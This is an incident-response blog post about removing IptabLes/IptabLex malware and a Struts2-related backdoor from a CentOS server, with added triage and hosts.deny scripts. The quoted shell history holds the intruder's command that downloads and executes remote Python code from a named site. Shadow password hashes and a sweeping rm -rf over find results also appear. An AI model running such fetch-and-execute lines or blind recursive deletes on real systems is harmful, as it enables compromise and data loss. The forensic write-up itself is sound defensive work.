Notes on the IptabLes and IptabLex virus cleanup process
Last year a Linux server was hacked and I read through 5 million lines of logs (looking back, that was quite something; the log files were many MB in size). Two days ago my junior told me that a teacher at the information center said one of our servers had apparently been compromised and was being used as a stepping stone into the intranet, frequently sending attack traffic to other servers on the intranet. So I went to the server that night.
This was my first time on this server, and I had no idea what state it was in. All I knew was that it ran Linux (I'd have to check what the hell the release was) and hosted a website.
After logging in, first check the release: CentOS 6.5. I'd previously only played with Ubuntu, so some things on it were more or less unfamiliar. Fine, no more rambling.
Let's look at the web side. A cd /var/ shows no www or htdocs directory. Is it not Tomcat? After searching, it is. Don't look at the web content first; the attacker already has privileges on this box, so check the server itself.
While writing this article I realized I shouldn't have poked at other things first; I should have backed up .bash_history first. Consider this a reminder to myself.
Look at passwd and shadow:
[root@localhost /]# stat /etc/passwd
  File: "/etc/passwd"
  Size: 1723      Blocks: 8          IO Block: 4096   regular file
Device: fd00h/64768d    Inode: 919098      Links: 1
Access: (0644/-rw-r--r--)  Uid: (0/root)   Gid: (0/root)
Access: 09:32:01.730288306 +0800
Modify: 09:31:28.469644869 +0800
Change: 09:31:28.503201786 +0800
[root@localhost /]# stat /etc/shadow
  File: "/etc/shadow"
  Size: 1177      Blocks: 8          IO Block: 4096   regular file
Device: fd00h/64768d    Inode: 919095      Links: 1
Access: (0000/----------)  Uid: (0/root)   Gid: (0/root)
Access: 09:40:01.734126039 +0800
Modify: 09:38:11.473125883 +0800
Change: 09:38:11.498275087 +0800
It looks like the intrusion succeeded on April 2. Looking under /home, there is one extra user. Let's look at the account files.
[root@localhost /]# cat /etc/shadow
mysql:!!:15791::::::
tomcat:!!:15791::::::
chu:$6$kG9zMTps$7H61NSjXMY3/Jc/tZrJtCuwFn1mhDyWXVg4blFghfLdbQNXr.6Li9tYt5fYVJsIlvwb0z68k/EQXsUljZK6.L0:15793:0:99999:7:::
sqzr:$6$yBrvX/HDaim/vrK4$uArYMq6Zr2XM7BWTzexC16RI6HGmOp9cs65AgLR.v.yx3rN0M6YzblNCJytGsguFSbsGN18OPpcyrSG63fKKS.:16162:0:99999:7:::
I won't paste passwd. In passwd, sqzr has UID 0, i.e. root privileges. userdel sqzr refuses, because the user is currently logged in, damn it. This user is simply an alias for root. I edited the two files directly and removed that row; the user is cleaned up.
Check the processes:
21911 ? 00:00:00 .IptabLex
21917 ? 00:00:00 .IptabLes
29093 ? 00:00:02 prwpodebiq
What is this? At first glance I took it for the firewall, but there was a second one. Then I remembered that Linux is case sensitive, so this was not iptables at all.
A Baidu search showed that it is indeed a virus, and others have been hit by it too.
http://www.xujiansheng.cn/2014/01/linux-viruses-iptablex-iptables/
Then there is prwpodebiq, a process name that is completely meaningless, with such a large PID; there must be a problem.
[root@localhost /]# find / -name prwpodebiq -print
/boot/prwpodebiq
/etc/rc.d/init.d/prwpodebiq
[root@localhost /]# cd /boot/
[root@localhost boot]# ll
total 19858
-rw-r--r--. 1 root    97862 May 20 2011 config-2.6.32-71.el6.x86_64
drwxr-xr-x. 3 root     1024 2013 efi
drwxr-xr-x. 2 root     1024 2013 grub
-rw-r--r--. 1 root 13419499 March 27 2013 initramfs-2.6.32-71.el6.x86_64.img
lrwxrwxrwx  1 root       25 September 16 22:31 IptabLes -> /etc/rc.d/init.d/IptabLes
lrwxrwxrwx  1 root       25 September 16 22:31 IptabLex -> /etc/rc.d/init.d/IptabLex
drwx------. 2 root    12288 March 27 2013 lost+found
-rwxr-x---  1 root   613533 21:29 prwpodebiq
-rw-r--r--. 1 root   160542 May 20 2011 symvers-2.6.32-71.el6.x86_64.gz
-rw-r--r--. 1 root  2226490 May 20 2011 System.map-2.6.32-71.el6.x86_64
-rwxr-xr-x. 1 root  3791040 May 20 2011 vmlinuz-2.6.32-71.el6.x86_64
[root@localhost boot]# stat prwpodebiq
  File: "prwpodebiq"
  Size: 613533    Blocks: 1200       IO Block: 1024   regular file
Device: 801h/2049d      Inode: 22          Links: 1
Access: (0750/-rwxr-x---)  Uid: (0/root)   Gid: (0/root)
Access: 23:16:18.000000000 +0800
Modify: 21:29:26.000000000 +0800
Change: 21:29:26.000000000 +0800
A freshly dropped executable in /boot is clearly the virus. Locate all of its files:
[root@localhost boot]# find / -name '*IptabL*' -print
/boot/.IptabLes
/boot/.IptabLex
/etc/rc.d/rc4.d/S55IptabLes
/etc/rc.d/rc4.d/S55IptabLex
/etc/rc.d/rc2.d/S55IptabLes
/etc/rc.d/rc2.d/S55IptabLex
/etc/rc.d/rc3.d/S55IptabLes
/etc/rc.d/rc3.d/S55IptabLex
/etc/rc.d/rc5.d/S55IptabLes
/etc/rc.d/rc5.d/S55IptabLex
/usr/.IptabLes
/usr/.IptabLex
[root@localhost boot]# rm -rf `find / -name '*IptabL*'`
Some items I deleted by hand, but there were too many, so you can just delete them directly with find.
In addition, lsof showed that some processes were tied to .pid files under /, so I deleted those too.
# ll -a / (only the suspicious files are shown)
-rw-r--r-- 1 root 5 Jan 12 :15 .mylisthb.pid
-rw-r--r-- 1 root 5 Jan 12 10:01 .mylistharvard.pid
-rw-r--r-- 1 root 5 Jan 12 10:01 .mylisthbSx.pid
-rw-r--r-- 1 root 5 Jan 12 16:57 .mylistx.pid
I thought the problem was solved. One more ps -A to see if anything is left... and so:
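The checks above (a UID-0 alias in passwd, symlinks and stray executables in /boot, hidden .IptabLe* files, .pid dotfiles in /) can be scripted so the whole host is swept at once. The following is an added triage script, not code from the original post; the sample tree it builds is constructed to mimic the listings above, and the function names are my own.

```sh
#!/bin/sh
# Added triage helpers for the IptabLes/IptabLex persistence described above.
# Each function takes a root directory, so it can run against a mounted image
# or the constructed tree from make_sample_root (run as root on a live host).

# Accounts with UID 0 that are not "root" (the "sqzr" alias trick).
uid0_aliases() {  # $1 = passwd file
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# /boot should hold only kernel artifacts: any symlink, or executable that is
# not vmlinuz/initramfs/initrd, is suspicious (prwpodebiq, tieyhxjhkl, .IptabLes).
boot_oddities() {  # $1 = root dir
    root=${1%/}
    find "$root/boot" -maxdepth 1 \( -type l -o \( -type f -perm -100 \) \) \
        ! -name 'vmlinuz-*' ! -name 'initramfs-*' ! -name 'initrd*' \
        | sed 's|.*/||' | LC_ALL=C sort
}

# Hidden regular files directly under / and /usr (the .pid files, /usr/.IptabLes)
# plus rcN.d start links named after the virus (S55IptabLes / S55IptabLex).
hidden_persistence() {  # $1 = root dir
    root=${1%/}
    { find "${root:-/}" "$root/usr" -maxdepth 1 -type f -name '.*' ;
      find "$root/etc/rc.d" -name 'S*IptabL*' 2>/dev/null ; } \
        | sed "s|^$root||" | LC_ALL=C sort
}

# Running processes whose executable lives under /boot (needs a live /proc).
procs_from_boot() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case "$exe" in /boot/*) echo "${p#/proc/} $exe" ;; esac
    done
}

# Constructed sample tree mimicking the infected host's listings (test data only).
make_sample_root() {  # $1 = empty dir
    mkdir -p "$1/boot" "$1/usr" "$1/etc/rc.d/init.d" "$1/etc/rc.d/rc3.d"
    printf 'root:x:0:0::/root:/bin/bash\nsqzr:x:0:0::/:/bin/bash\n' > "$1/etc/passwd"
    touch "$1/boot/vmlinuz-2.6.32-71.el6.x86_64" "$1/boot/config-2.6.32-71.el6.x86_64"
    touch "$1/boot/prwpodebiq" "$1/etc/rc.d/init.d/IptabLes" "$1/usr/.IptabLes" "$1/.mylisthb.pid"
    chmod 755 "$1/boot/vmlinuz-2.6.32-71.el6.x86_64"; chmod 750 "$1/boot/prwpodebiq"
    ln -s /etc/rc.d/init.d/IptabLes "$1/boot/.IptabLes"
    ln -s ../init.d/IptabLes "$1/etc/rc.d/rc3.d/S55IptabLes"
}
```

On a live host, `uid0_aliases /etc/passwd; boot_oddities /; hidden_persistence /; procs_from_boot` reports the same indicators the post found by hand.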
3499 ? 00:00:00 sshd
3505 ? 00:00:00 kdpiaqommj
3506 pts/0 00:00:00 ps
29093 ? 00:00:10 prwpodebiq
29101 ? 00:00:00 flush-8:0
31327 ? 00:00:00 sshd
31378 pts/0 00:00:06 bash
Now there is a kdpiaqommj as well as prwpodebiq, names with no meaning at all. lsof showed they live under /boot, so I killed them and then removed the files.
And again, another one, tieyhxjhkl, turned up.
[root@localhost bin]# lsof -p 5669
COMMAND   PID  USER FD   TYPE DEVICE SIZE/OFF NODE NAME
tieyhxjhk 5669 root cwd  DIR  253,0  4096     1324611 /usr/local/tomcat/apache-tomcat-7.0.39/bin
tieyhxjhk 5669 root rtd  DIR  253,0  4096     2 /
tieyhxjhk 5669 root txt  REG         613533   18 /boot/tieyhxjhkl
tieyhxjhk 5669 root 0u   CHR  1,3    0t0      3569 /dev/null
tieyhxjhk 5669 root 1u   CHR  1,3    0t0      3569 /dev/null
tieyhxjhk 5669 root 2u   CHR  1,3    0t0      3569 /dev/null
tieyhxjhk 5669 root 3u   IPv4 1445967634 0t0  TCP <my IP>:59978->66.102.253.30:dvr-esm (SYN_SENT)
Is this a reverse shell or something like it?
There must be changed files too. Go to the Tomcat directory and check.
[root@localhost bin]# ll
total 1828
-rw-r--r-- 1 root   28615 March 22 2013 bootstrap.jar
-rw-r--r-- 1 root     461 May 18 00:54 c:\2.vbs
-rw-r--r-- 1 root   13217 March 22 2013 catalina.bat
-rwxr-xr-x 1 root   19276 March 22 2013 catalina.sh
-rw-r--r-- 1 root    2121 March 22 2013 catalina-tasks.xml
-rw-r--r-- 1 root   24281 March 22 2013 commons-daemon.jar
-rw-r--r-- 1 root  202451 March 22 2013 commons-daemon-native.tar.gz
-rw-r--r-- 1 root    2131 March 22 2013 configtest.bat
-rwxr-xr-x 1 root    1982 March 22 2013 configtest.sh
-rw-r--r-- 1 root    1342 March 22 2013 cpappend.bat
-rwxr-xr-x 1 root   22987 May 23 09:04 D32
-rwxr-xr-x 1 root   27805 May 23 09:04 D64
-rwxr-xr-x 1 root    7492 March 22 2013 daemon.sh
-rw-r--r-- 1 root    2178 March 22 2013 digest.bat
-rwxr-xr-x 1 root    2021 March 22 2013 digest.sh
-rw-r--r-- 1 root 1103207 July 11 02:49 getsetup.hb.1
-rw-r--r-- 1 root       0 August 5 16:19 ********pwd
-rw-r--r-- 1 root    3264 March 22 2013 setclasspath.bat
-rwxr-xr-x 1 root    3524 March 22 2013 setclasspath.sh
-rw-r--r-- 1 root    2111 March 22 2013 shutdown.bat
-rwxr-xr-x 1 root    1960 March 22 2013 shutdown.sh
-rw-r--r-- 1 root    2112 March 22 2013 startup.bat
-rwxr-xr-x 1 root    1961 March 22 2013 startup.sh
-rw-r--r-- 1 root   38161 March 22 2013 tomcat-juli.jar
-rw-r--r-- 1 root  288166 March 22 2013 tomcat-native.tar.gz
-rw-r--r-- 1 root    4114 March 22 2013 tool-wrapper.bat
-rwxr-xr-x 1 root    5086 March 22 2013 tool-wrapper.sh
-rw-r--r-- 1 root    2116 March 22 2013 version.bat
-rwxr-xr-x 1 root    1965 2013 version.sh
The files highlighted in red in the original listing are not part of a Tomcat distribution, so I deleted them.
Then kill the process. Then restart the server.
Then I was floored!!!!!! This time lsof's cwd was /, and there was nothing in the root directory.
Then I found that the process starts under a random name and spawns two child processes, also with random names, each surviving for less than 2 seconds. Kill the parent process and at the same time it regenerates its own executables under /boot.
netstat -anput shows what this process does: TCP <my IP>:59978->66.102.253.30:dvr-esm (SYN_SENT).
tcp 0 1 <my IP>:41939 222.34.129.154:2804 SYN_SENT 1701/bash
This damn thing looks like a reverse shell.
Let's take a look at .bash_history.
973 find -name '*tomcat*'
974 find -name 'index.jsp'
975 ------------------------------
976 find -name 'index.jsp'
977 ls
978 top
979 ls
980 python -c "exec(__import__('urllib').urlopen('https://www.yascanner.com/0c971e54b1eef79a').read())" -m 50
981 python2
982 python
983 ls
984 wget https://www.python.org/ftp//python/2.7/Python-2.7.tar.bz2
985 wget www.baidu.com
986 cat index.html
987 wget https://www.python.org/ftp//python/2.7/Python-2.7.tar.bz2
988 wget https://www.python.org/ftp//python/2.7/Python-2.7.tar.bz2 --no-check-certificate
989 ls
990 tar -jxvf Python-2.7.tar.bz2
991 cd p
992 cd Python-2.7/
993 dir
994 ./configure
995 make
996 make install
997 python -c "exec(__import__('urllib').urlopen('https://www.yascanner.com/0c971e54b1eef79a').read())" -m 50
998 python -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/0c971e54b1eef79a').read())" -m 50
999 pip
1000 yum install python-zlib
He installed Python first, then fetched a script from that URL. A look at the website shows it is a hacking site; that is the privilege escalation and the webshell. I'd like to see what else he did, but bash_history only keeps 1000 lines!!!!!
tail -100 /var/log/secure
Looking at the security log, a public IP was desperately trying to brute-force the root password, over ssh. Disabling ssh would of course be acceptable, but I still need ssh from the public network, so all I can do is block this public IP in hosts.deny.
The Network Center of Northeastern University publishes a list of IP addresses commonly seen in ssh attacks and a shell script:
Web: http://antivirus.neu.edu.cn/scan/ssh.php
That blocks the ssh connections from those addresses, but the process inside is still running.
TCP <my IP>:59978->66.102.253.30:dvr-esm (SYN_SENT)
He most likely got onto the server through the Struts2 vulnerability, but the backdoor he left behind cannot be fully resolved yet.
The Struts2 vulnerability can be viewed here:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
That is as far as I have gotten for now. Let's see what happens.
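Counting the failed logins per source address in /var/log/secure makes the hosts.deny decision mechanical instead of eyeballing tail output. This is an added example, not code from the original post; the log lines are constructed in the format CentOS 6 sshd writes, and the threshold of 5 failures is an assumption.

```sh
#!/bin/sh
# Added example: tally failed ssh logins per source IP from /var/log/secure
# and emit hosts.deny entries for repeat offenders (threshold is an assumption).

# Failed-password attempts per source IP, highest first, as "count ip".
# Matches both "Failed password for root from X" and "... for invalid user Y from X".
failed_by_ip() {  # $1 = secure log file
    awk '/sshd\[[0-9]+\]: Failed password for/ {
             for (i = 1; i <= NF; i++) if ($i == "from") n[$(i+1)]++
         }
         END { for (ip in n) print n[ip], ip }' "$1" | sort -rn
}

# hosts.deny lines for IPs with at least $2 failures (default 5).
# Append the output to /etc/hosts.deny after reviewing it.
hosts_deny_entries() {  # $1 = secure log file, $2 = threshold
    failed_by_ip "$1" | awk -v t="${2:-5}" '$1 >= t { print "sshd: " $2 }'
}

# Constructed sample log (documentation IPs, not real attacker addresses).
write_sample_log() {  # $1 = output path
    cat > "$1" <<'EOF'
Sep 16 22:30:01 localhost sshd[4101]: Failed password for root from 203.0.113.9 port 51022 ssh2
Sep 16 22:30:03 localhost sshd[4101]: Failed password for root from 203.0.113.9 port 51022 ssh2
Sep 16 22:30:05 localhost sshd[4103]: Failed password for invalid user admin from 203.0.113.9 port 51030 ssh2
Sep 16 22:30:08 localhost sshd[4105]: Failed password for root from 203.0.113.9 port 51041 ssh2
Sep 16 22:30:11 localhost sshd[4107]: Failed password for root from 203.0.113.9 port 51050 ssh2
Sep 16 22:31:00 localhost sshd[4110]: Accepted password for tomcat from 198.51.100.20 port 40011 ssh2
Sep 16 22:31:40 localhost sshd[4112]: Failed password for root from 198.51.100.20 port 40015 ssh2
EOF
}
```

On the real host, `hosts_deny_entries /var/log/secure 5 >> /etc/hosts.deny` after checking the list does what the post did by hand for one address.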
The iptables process on Linux is acting up. Network resources are basically fully consumed and the host cannot be pinged.
Brother, you are infected. Linux DDoS process file names: .IptabLes .IptabLex IptabLes IptabLex
pkill -9 .IptabLes
pkill -9 .IptabLex
pkill -9 IptabLes
pkill -9 IptabLex
find / -name '.IptabLe*'
Then delete them.
Copy the process's file to a virtual machine and run it there.
Trace it with strace -p <pid> to find the IP address it communicates with.
Probably a website vulnerability.